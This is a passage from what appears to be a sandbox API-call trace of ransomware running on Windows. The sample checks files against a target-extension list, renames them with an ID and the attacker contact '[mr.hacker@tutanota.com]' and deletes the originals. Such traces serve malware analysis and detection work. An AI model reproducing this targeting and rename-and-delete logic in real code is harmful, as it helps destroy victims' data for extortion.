Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.417] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_k_col.hxk")) returned 1 [0274.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.417] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.417] lstrlenW (lpString=".doc") returned 4 [0274.417] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.417] lstrlenW (lpString=".docx") returned 5 [0274.417] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.417] lstrlenW (lpString=".pdf") returned 4 [0274.417] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.417] lstrlenW (lpString=".xls") returned 4 [0274.417] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.417] lstrlenW (lpString=".xlsx") returned 5 [0274.418] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.418] lstrlenW (lpString=".ppt") returned 4 [0274.418] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString=".zip") returned 4 [0274.418] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString=".rar") returned 4 [0274.418] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString=".bz2") returned 4 [0274.418] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.418] lstrlenW (lpString=".7z") returned 3 [0274.418] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString=".dbf") returned 4 [0274.418] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString=".1cd") returned 4 [0274.418] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString=".jpg") returned 4 [0274.418] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.418] lstrlenW (lpString=".doc") returned 4 [0274.418] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.418] lstrlenW (lpString=".docx") returned 5 [0274.418] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.418] lstrlenW (lpString=".pdf") returned 4 [0274.418] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString=".xls") returned 4 [0274.418] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.418] lstrlenW (lpString=".xlsx") returned 5 [0274.419] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.419] lstrlenW (lpString=".ppt") returned 4 [0274.419] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.419] lstrlenW (lpString=".zip") returned 4 [0274.419] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.419] lstrlenW (lpString=".rar") returned 4 [0274.419] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.419] lstrlenW (lpString=".bz2") returned 4 [0274.419] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.419] lstrlenW (lpString=".7z") returned 3 [0274.419] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.419] lstrlenW (lpString=".dbf") returned 4 [0274.419] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.419] lstrlenW (lpString=".1cd") returned 4 [0274.419] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_K_COL.HXK") returned 72 [0274.419] lstrlenW (lpString=".jpg") returned 4 [0274.419] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.419] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0274.419] lstrlenW (lpString="INSTLIST.VRD") returned 12 [0274.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.428] GetFileSizeEx (in: hFile=0x2ac, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=1899) returned 1 [0274.429] CloseHandle (hObject=0x2ac) returned 1 [0274.429] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INSTLIST.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\instlist.vrd")) Thread: id = 65 os_tid = 0x69c [0263.749] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x35892f8 [0263.749] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3599300 [0263.749] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x59a3e0 [0263.749] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b3908 [0263.750] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x59a3f8 [0263.750] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x41f0020 [0263.750] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x59a410 [0263.750] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59a410, Size=0x20) returned 0x3584e08 [0263.750] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x59a410 [0263.750] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x59a410, Size=0x20) returned 0x3584e30 [0263.750] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.750] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.750] Wow64DisableWow64FsRedirection (in: OldValue=0x3a8ff58 | out: OldValue=0x3a8ff58*=0x0) returned 1 [0263.750] lstrlenW (lpString="kernel32.dll") returned 12 [0263.750] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3584e08 | out: hHeap=0x520000) returned 1 [0263.750] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.750] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x3584e30 | out: hHeap=0x520000) returned 1 [0263.750] Sleep (dwMilliseconds=0x64) [0263.983] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0263.983] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0263.983] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0264.082] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=47452) returned 1 [0264.082] CloseHandle (hObject=0x348) returned 1 [0264.082] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0264.082] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.082] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.082] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.082] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.082] lstrlenW (lpString=".doc") returned 4 [0264.082] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.082] lstrlenW (lpString=".docx") returned 5 [0264.082] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.082] lstrlenW (lpString=".pdf") returned 4 [0264.082] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.082] lstrlenW (lpString=".xls") returned 4 [0264.082] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.082] lstrlenW (lpString=".xlsx") returned 5 [0264.082] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.082] lstrlenW (lpString=".ppt") returned 4 [0264.082] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.082] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.082] lstrlenW (lpString=".zip") returned 4 [0264.082] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.082] lstrlenW (lpString=".rar") returned 4 [0264.082] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.082] lstrlenW (lpString=".bz2") returned 4 [0264.082] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.082] lstrlenW (lpString=".7z") returned 3 [0264.083] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString=".dbf") returned 4 [0264.083] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString=".1cd") returned 4 [0264.083] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString=".jpg") returned 4 [0264.083] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString=".doc") returned 4 [0264.083] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString=".docx") returned 5 [0264.083] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.083] lstrlenW (lpString=".pdf") returned 4 [0264.083] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString=".xls") returned 4 [0264.083] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.083] lstrlenW (lpString=".xlsx") returned 5 [0264.083] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.083] lstrlenW (lpString=".ppt") returned 4 [0264.083] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.083] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.083] lstrlenW (lpString=".zip") returned 4 [0264.083] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.083] lstrlenW (lpString=".rar") returned 4 [0264.083] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.084] lstrlenW (lpString=".bz2") returned 4 [0264.084] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.084] lstrlenW (lpString=".7z") returned 3 [0264.084] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.084] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.084] lstrlenW (lpString=".dbf") returned 4 [0264.084] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.084] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.084] lstrlenW (lpString=".1cd") returned 4 [0264.084] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.084] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0264.084] lstrlenW (lpString=".jpg") returned 4 [0264.084] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.084] Sleep (dwMilliseconds=0x64) [0264.279] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.279] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0264.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.280] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=3584) returned 1 [0264.280] CloseHandle (hObject=0x344) returned 1 [0264.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui")) returned 0x20 [0264.280] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.280] lstrlenW (lpString=".doc") returned 4 [0264.280] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.280] lstrlenW (lpString=".docx") returned 5 [0264.280] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0264.280] lstrlenW (lpString=".pdf") returned 4 [0264.280] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.280] lstrlenW (lpString=".xls") returned 4 [0264.280] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.280] lstrlenW (lpString=".xlsx") returned 5 [0264.280] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0264.280] lstrlenW (lpString=".ppt") returned 4 [0264.280] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.280] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.280] lstrlenW (lpString=".zip") returned 4 [0264.280] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.280] lstrlenW (lpString=".rar") returned 4 [0264.280] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.280] lstrlenW (lpString=".bz2") returned 4 [0264.280] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.280] lstrlenW (lpString=".7z") returned 3 [0264.281] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString=".dbf") returned 4 [0264.281] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString=".1cd") returned 4 [0264.281] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString=".jpg") returned 4 [0264.281] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString=".doc") returned 4 [0264.281] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.281] lstrlenW (lpString=".docx") returned 5 [0264.281] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0264.281] lstrlenW (lpString=".pdf") returned 4 [0264.281] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.281] lstrlenW (lpString=".xls") returned 4 [0264.281] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.281] lstrlenW (lpString=".xlsx") returned 5 [0264.281] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0264.281] lstrlenW (lpString=".ppt") returned 4 [0264.281] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.281] lstrlenW (lpString=".zip") returned 4 [0264.281] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.281] lstrlenW (lpString=".rar") returned 4 [0264.281] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.282] lstrlenW (lpString=".bz2") returned 4 [0264.282] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.282] lstrlenW (lpString=".7z") returned 3 [0264.282] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.282] lstrlenW (lpString=".dbf") returned 4 [0264.282] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.282] lstrlenW (lpString=".1cd") returned 4 [0264.282] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\tipresx.dll.mui") returned 72 [0264.282] lstrlenW (lpString=".jpg") returned 4 [0264.282] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.282] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.282] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0264.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.282] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=3584) returned 1 [0264.282] CloseHandle (hObject=0x344) returned 1 [0264.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui")) returned 0x20 [0264.282] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.283] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.283] lstrlenW (lpString=".doc") returned 4 [0264.283] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.283] lstrlenW (lpString=".docx") returned 5 [0264.283] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0264.283] lstrlenW (lpString=".pdf") returned 4 [0264.283] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.283] lstrlenW (lpString=".xls") returned 4 [0264.283] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.283] lstrlenW (lpString=".xlsx") returned 5 [0264.283] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0264.283] lstrlenW (lpString=".ppt") returned 4 [0264.283] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.283] lstrlenW (lpString=".zip") returned 4 [0264.283] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.283] lstrlenW (lpString=".rar") returned 4 [0264.283] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.283] lstrlenW (lpString=".bz2") returned 4 [0264.283] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.283] lstrlenW (lpString=".7z") returned 3 [0264.283] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.283] lstrlenW (lpString=".dbf") returned 4 [0264.283] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.283] lstrlenW (lpString=".1cd") returned 4 [0264.283] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString=".jpg") returned 4 [0264.284] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString=".doc") returned 4 [0264.284] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.284] lstrlenW (lpString=".docx") returned 5 [0264.284] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0264.284] lstrlenW (lpString=".pdf") returned 4 [0264.284] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.284] lstrlenW (lpString=".xls") returned 4 [0264.284] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.284] lstrlenW (lpString=".xlsx") returned 5 [0264.284] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0264.284] lstrlenW (lpString=".ppt") returned 4 [0264.284] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString=".zip") returned 4 [0264.284] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.284] lstrlenW (lpString=".rar") returned 4 [0264.284] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.284] lstrlenW (lpString=".bz2") returned 4 [0264.284] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.284] lstrlenW (lpString=".7z") returned 3 [0264.284] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString=".dbf") returned 4 [0264.284] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.284] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.284] lstrlenW (lpString=".1cd") returned 4 [0264.284] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.285] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ja-JP\\tipresx.dll.mui") returned 72 [0264.285] lstrlenW (lpString=".jpg") returned 4 [0264.285] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.285] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0264.285] lstrlenW (lpString="journal.dll") returned 11 [0264.285] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0264.559] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=1367552) returned 1 [0264.560] CloseHandle (hObject=0x348) returned 1 [0264.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll")) returned 0x20 [0264.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.579] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.589] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 62 [0264.593] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft 